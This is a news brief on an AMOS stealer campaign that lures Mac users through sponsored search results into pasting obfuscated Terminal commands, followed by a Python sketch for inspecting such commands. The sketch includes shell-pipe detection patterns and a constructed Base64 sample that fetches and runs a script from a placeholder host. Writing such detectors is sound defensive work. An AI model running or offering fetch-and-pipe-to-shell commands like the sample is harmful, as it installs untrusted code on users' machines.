HeadlinesBriefing.com

Mac Malware Campaign Targets Google Search Results

Hacker News: Front Page

Security researchers have uncovered a new malware campaign delivering AMOS stealers to Macs through Google search results. The attack exploits sponsored links and Medium articles, tricking users into running malicious Terminal commands. This follows a similar campaign from last month involving Google's AI search results.

The malware spreads through fake Apple support sites and compromised Medium articles appearing in Google's sponsored results. When users search for common macOS troubleshooting queries like "how to clear cache on macos tahoe," they encounter poisoned content leading to malicious scripts. The attack uses Base64 obfuscation similar to previous campaigns.

Once executed, the AMOS stealer immediately accesses sensitive data including Documents folders and Notes. The malware creates hidden files in the user's home directory, including an AppleScript agent and a Mach-O binary, and even stores passwords in plain text. Researchers note the malware shows unusual persistence even in virtual machine environments.

Security experts emphasize that macOS protections cannot prevent attacks where users are tricked into bypassing safeguards. The campaign highlights the ongoing challenge of malicious content in search results and the importance of verifying sources before executing any commands. Users should avoid running Terminal commands from untrusted sources and verify website authenticity before following technical advice.
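
As an added example (not from the researchers or the article), the sketch below shows one way to inspect a copied Terminal command before running it: it decodes Base64-looking runs so they can be read and flags output piped into a shell, without executing anything. The command shapes, regexes, function names and sample strings are assumptions constructed for illustration; the article does not publish the actual commands.

```python
import base64
import binascii
import re

# Assumed heuristics for illustration; the article does not publish the real commands.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SHELL = r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b[^\n]*" + SHELL)
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^\n]*" + SHELL)


def decode_blobs(command):
    """Decode base64-looking runs to text for reading. Nothing is executed."""
    decoded = []
    for match in B64_RUN.finditer(command):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def inspect_command(command):
    """Return findings for the pasted command and for each decoded layer."""
    decoded = decode_blobs(command)
    findings = set()
    if decoded:
        findings.add("embedded base64 payload")
    for layer in [command] + decoded:
        if DECODE_TO_SHELL.search(layer):
            findings.add("base64 output piped to a shell")
        if FETCH_TO_SHELL.search(layer):
            findings.add("download piped to a shell")
    return {"findings": sorted(findings), "decoded": decoded}


# Constructed samples: a harmless stand-in payload on a reserved .invalid host.
_hidden = "curl -fsSL https://example.invalid/fix.sh | sh"
SAMPLE_PASTED = "echo " + base64.b64encode(_hidden.encode()).decode() + " | base64 -d | sh"
SAMPLE_BENIGN = "du -sh ~/Library/Caches"

if __name__ == "__main__":
    for sample in (SAMPLE_PASTED, SAMPLE_BENIGN):
        print(inspect_command(sample))
```

A clean result from these heuristics does not make a command safe; they only surface the obfuscated layer so it can be read before anything is run.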